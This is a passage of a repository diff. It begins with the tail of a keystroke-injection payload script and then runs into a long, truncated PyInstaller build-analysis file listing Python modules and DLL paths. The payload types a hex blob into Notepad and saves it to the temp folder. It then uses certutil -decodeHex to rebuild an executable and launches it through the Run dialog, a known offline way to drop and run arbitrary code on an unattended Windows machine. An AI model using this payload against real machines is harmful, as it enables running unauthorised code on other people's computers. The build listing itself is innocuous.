+STRINGLN notepad.exe
+DELAY 2000
+STRING #HEX_CODE
+DELAY 2000
+ALT F
+DELAY 1000
+STRING S
+DELAY 1000
+STRINGLN "%TEMP%\example.hex"
+DELAY 1000
+ENTER
+DELAY 1000
+ALT F4
+DELAY 2000
+GUI r
+DELAY 500
+STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
+DELAY 1000
+ENTER
+DELAY 1000
+GUI r
+DELAY 250
+STRINGLN "%TEMP%\pranhex.exe"
+```

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/build/example/Analysis-00.toc

@@ -0,0 +1,550 @@
+(['C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+  'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\example.py'],
+ ['C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+  'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets'],
+ ['codecs'],
+ ['C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\pygame\\__pyinstaller',
+  'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\numpy\\_pyinstaller',
+  'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\_pyinstaller_hooks_contrib\\hooks\\stdhooks',
+  'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\_pyinstaller_hooks_contrib\\hooks\\stdhooks\\__pycache__',
+  'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\_pyinstaller_hooks_contrib\\hooks\\rthooks',
+  'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\_pyinstaller_hooks_contrib\\hooks\\rthooks\\__pycache__',
+  'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\_pyinstaller_hooks_contrib\\hooks'],
+ {},
+ [],
+ [],
+ False,
+ False,
+ False,
+ {},
+ [],
+ [],
+ '3.11.1 (tags/v3.11.1:a7a450f, Dec  6 2022, 19:58:39) [MSC v.1934 64 bit '
+ '(AMD64)]',
+ [('pyi_rth_inspect',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\PyInstaller\\hooks\\rthooks\\pyi_rth_inspect.py',
+   'PYSOURCE'),
+  ('example',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\example.py',
+   'PYSOURCE')],
+ [('inspect',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\inspect.py',
+   'PYMODULE'),
+  ('importlib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\__init__.py',
+   'PYMODULE'),
+  ('importlib._bootstrap_external',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\_bootstrap_external.py',
+   'PYMODULE'),
+  ('importlib.metadata',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\__init__.py',
+   'PYMODULE'),
+  ('typing',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\typing.py',
+   'PYMODULE'),
+  ('importlib.abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\abc.py',
+   'PYMODULE'),
+  ('importlib.resources.abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\abc.py',
+   'PYMODULE'),
+  ('importlib.resources',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\__init__.py',
+   'PYMODULE'),
+  ('importlib.resources._legacy',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_legacy.py',
+   'PYMODULE'),
+  ('importlib.resources._common',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_common.py',
+   'PYMODULE'),
+  ('importlib.resources._adapters',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_adapters.py',
+   'PYMODULE'),
+  ('tempfile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\tempfile.py',
+   'PYMODULE'),
+  ('random',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\random.py',
+   'PYMODULE'),
+  ('_strptime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_strptime.py',
+   'PYMODULE'),
+  ('datetime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\datetime.py',
+   'PYMODULE'),
+  ('calendar',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\calendar.py',
+   'PYMODULE'),
+  ('statistics',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\statistics.py',
+   'PYMODULE'),
+  ('decimal',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\decimal.py',
+   'PYMODULE'),
+  ('_pydecimal',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_pydecimal.py',
+   'PYMODULE'),
+  ('contextvars',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\contextvars.py',
+   'PYMODULE'),
+  ('fractions',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\fractions.py',
+   'PYMODULE'),
+  ('numbers',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\numbers.py',
+   'PYMODULE'),
+  ('hashlib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\hashlib.py',
+   'PYMODULE'),
+  ('logging',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\logging\\__init__.py',
+   'PYMODULE'),
+  ('pickle',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\pickle.py',
+   'PYMODULE'),
+  ('pprint',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\pprint.py',
+   'PYMODULE'),
+  ('dataclasses',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\dataclasses.py',
+   'PYMODULE'),
+  ('copy',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\copy.py',
+   'PYMODULE'),
+  ('_compat_pickle',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_compat_pickle.py',
+   'PYMODULE'),
+  ('struct',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\struct.py',
+   'PYMODULE'),
+  ('threading',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\threading.py',
+   'PYMODULE'),
+  ('_threading_local',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_threading_local.py',
+   'PYMODULE'),
+  ('string',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\string.py',
+   'PYMODULE'),
+  ('bisect',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\bisect.py',
+   'PYMODULE'),
+  ('shutil',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\shutil.py',
+   'PYMODULE'),
+  ('tarfile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\tarfile.py',
+   'PYMODULE'),
+  ('gzip',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\gzip.py',
+   'PYMODULE'),
+  ('_compression',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_compression.py',
+   'PYMODULE'),
+  ('lzma',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\lzma.py',
+   'PYMODULE'),
+  ('bz2',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\bz2.py',
+   'PYMODULE'),
+  ('importlib._abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\_abc.py',
+   'PYMODULE'),
+  ('contextlib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\contextlib.py',
+   'PYMODULE'),
+  ('importlib.metadata._itertools',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_itertools.py',
+   'PYMODULE'),
+  ('importlib.metadata._functools',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_functools.py',
+   'PYMODULE'),
+  ('importlib.metadata._collections',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_collections.py',
+   'PYMODULE'),
+  ('importlib.metadata._meta',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_meta.py',
+   'PYMODULE'),
+  ('importlib.metadata._adapters',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_adapters.py',
+   'PYMODULE'),
+  ('importlib.metadata._text',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_text.py',
+   'PYMODULE'),
+  ('email.message',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\message.py',
+   'PYMODULE'),
+  ('email.policy',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\policy.py',
+   'PYMODULE'),
+  ('email.contentmanager',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\contentmanager.py',
+   'PYMODULE'),
+  ('email.quoprimime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\quoprimime.py',
+   'PYMODULE'),
+  ('email.headerregistry',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\headerregistry.py',
+   'PYMODULE'),
+  ('email._header_value_parser',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_header_value_parser.py',
+   'PYMODULE'),
+  ('email.iterators',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\iterators.py',
+   'PYMODULE'),
+  ('email.generator',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\generator.py',
+   'PYMODULE'),
+  ('email._encoded_words',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_encoded_words.py',
+   'PYMODULE'),
+  ('base64',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\base64.py',
+   'PYMODULE'),
+  ('getopt',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\getopt.py',
+   'PYMODULE'),
+  ('gettext',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\gettext.py',
+   'PYMODULE'),
+  ('email.charset',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\charset.py',
+   'PYMODULE'),
+  ('email.encoders',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\encoders.py',
+   'PYMODULE'),
+  ('email.base64mime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\base64mime.py',
+   'PYMODULE'),
+  ('email._policybase',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_policybase.py',
+   'PYMODULE'),
+  ('email.header',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\header.py',
+   'PYMODULE'),
+  ('email.errors',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\errors.py',
+   'PYMODULE'),
+  ('email.utils',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\utils.py',
+   'PYMODULE'),
+  ('email._parseaddr',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_parseaddr.py',
+   'PYMODULE'),
+  ('socket',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\socket.py',
+   'PYMODULE'),
+  ('selectors',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\selectors.py',
+   'PYMODULE'),
+  ('quopri',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\quopri.py',
+   'PYMODULE'),
+  ('textwrap',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\textwrap.py',
+   'PYMODULE'),
+  ('zipfile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\zipfile.py',
+   'PYMODULE'),
+  ('py_compile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\py_compile.py',
+   'PYMODULE'),
+  ('importlib.util',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\util.py',
+   'PYMODULE'),
+  ('email',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\__init__.py',
+   'PYMODULE'),
+  ('email.parser',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\parser.py',
+   'PYMODULE'),
+  ('email.feedparser',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\feedparser.py',
+   'PYMODULE'),
+  ('csv',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\csv.py',
+   'PYMODULE'),
+  ('importlib.readers',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\readers.py',
+   'PYMODULE'),
+  ('importlib.resources.readers',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\readers.py',
+   'PYMODULE'),
+  ('importlib.resources._itertools',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_itertools.py',
+   'PYMODULE'),
+  ('importlib._bootstrap',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\_bootstrap.py',
+   'PYMODULE'),
+  ('argparse',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\argparse.py',
+   'PYMODULE'),
+  ('importlib.machinery',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\machinery.py',
+   'PYMODULE'),
+  ('dis',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\dis.py',
+   'PYMODULE'),
+  ('opcode',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\opcode.py',
+   'PYMODULE'),
+  ('ast',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ast.py',
+   'PYMODULE'),
+  ('subprocess',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\subprocess.py',
+   'PYMODULE'),
+  ('signal',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\signal.py',
+   'PYMODULE'),
+  ('getpass',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\getpass.py',
+   'PYMODULE'),
+  ('nturl2path',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\nturl2path.py',
+   'PYMODULE'),
+  ('ftplib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ftplib.py',
+   'PYMODULE'),
+  ('netrc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\netrc.py',
+   'PYMODULE'),
+  ('shlex',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\shlex.py',
+   'PYMODULE'),
+  ('mimetypes',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\mimetypes.py',
+   'PYMODULE'),
+  ('http.cookiejar',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\http\\cookiejar.py',
+   'PYMODULE'),
+  ('http',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\http\\__init__.py',
+   'PYMODULE'),
+  ('ssl',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ssl.py',
+   'PYMODULE'),
+  ('http.client',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\http\\client.py',
+   'PYMODULE'),
+  ('stringprep',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\stringprep.py',
+   'PYMODULE'),
+  ('_py_abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_py_abc.py',
+   'PYMODULE'),
+  ('tracemalloc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\tracemalloc.py',
+   'PYMODULE'),
+  ('ctypes',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ctypes\\__init__.py',
+   'PYMODULE'),
+  ('ctypes._endian',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ctypes\\_endian.py',
+   'PYMODULE')],
+ [('api-ms-win-crt-runtime-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-runtime-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-math-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-math-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-stdio-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-stdio-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-heap-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-heap-l1-1-0.dll',
+   'BINARY'),
+  ('VCRUNTIME140.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\VCRUNTIME140.dll',
+   'BINARY'),
+  ('api-ms-win-crt-locale-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-locale-l1-1-0.dll',
+   'BINARY'),
+  ('python311.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\python311.dll',
+   'BINARY'),
+  ('ucrtbase.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\ucrtbase.dll',
+   'BINARY'),
+  ('api-ms-win-crt-convert-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-convert-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-string-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-string-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-filesystem-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-filesystem-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-process-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-process-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-conio-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-conio-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-time-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-time-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-environment-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-environment-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-namedpipe-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-namedpipe-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-util-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-util-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-localization-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-localization-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processthreads-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processthreads-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l2-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l2-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-memory-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-memory-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-rtlsupport-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-rtlsupport-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-errorhandling-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-errorhandling-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-synch-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-synch-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-synch-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-synch-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-sysinfo-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-sysinfo-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processenvironment-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processenvironment-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-handle-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-handle-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-timezone-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-timezone-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-datetime-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-datetime-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-profile-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-profile-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-heap-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-heap-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processthreads-l1-1-1.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processthreads-l1-1-1.dll',
+   'BINARY'),
+  ('api-ms-win-core-interlocked-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-interlocked-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-string-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-string-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-libraryloader-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-libraryloader-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-console-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-console-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-debug-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-debug-l1-1-0.dll',
+   'BINARY'),
+  ('_decimal.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_decimal.pyd',
+   'EXTENSION'),
+  ('_hashlib.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_hashlib.pyd',
+   'EXTENSION'),
+  ('_lzma.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_lzma.pyd',
+   'EXTENSION'),
+  ('_bz2.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_bz2.pyd',
+   'EXTENSION'),
+  ('select.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\select.pyd',
+   'EXTENSION'),
+  ('_socket.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_socket.pyd',
+   'EXTENSION'),
+  ('unicodedata.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\unicodedata.pyd',
+   'EXTENSION'),
+  ('_ssl.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_ssl.pyd',
+   'EXTENSION'),
+  ('_ctypes.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_ctypes.pyd',
+   'EXTENSION'),
+  ('libcrypto-1_1.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libcrypto-1_1.dll',
+   'BINARY'),
+  ('libssl-1_1.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libssl-1_1.dll',
+   'BINARY'),
+  ('libffi-8.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libffi-8.dll',
+   'BINARY'),
+  ('api-ms-win-crt-utility-l1-1-0.dll',
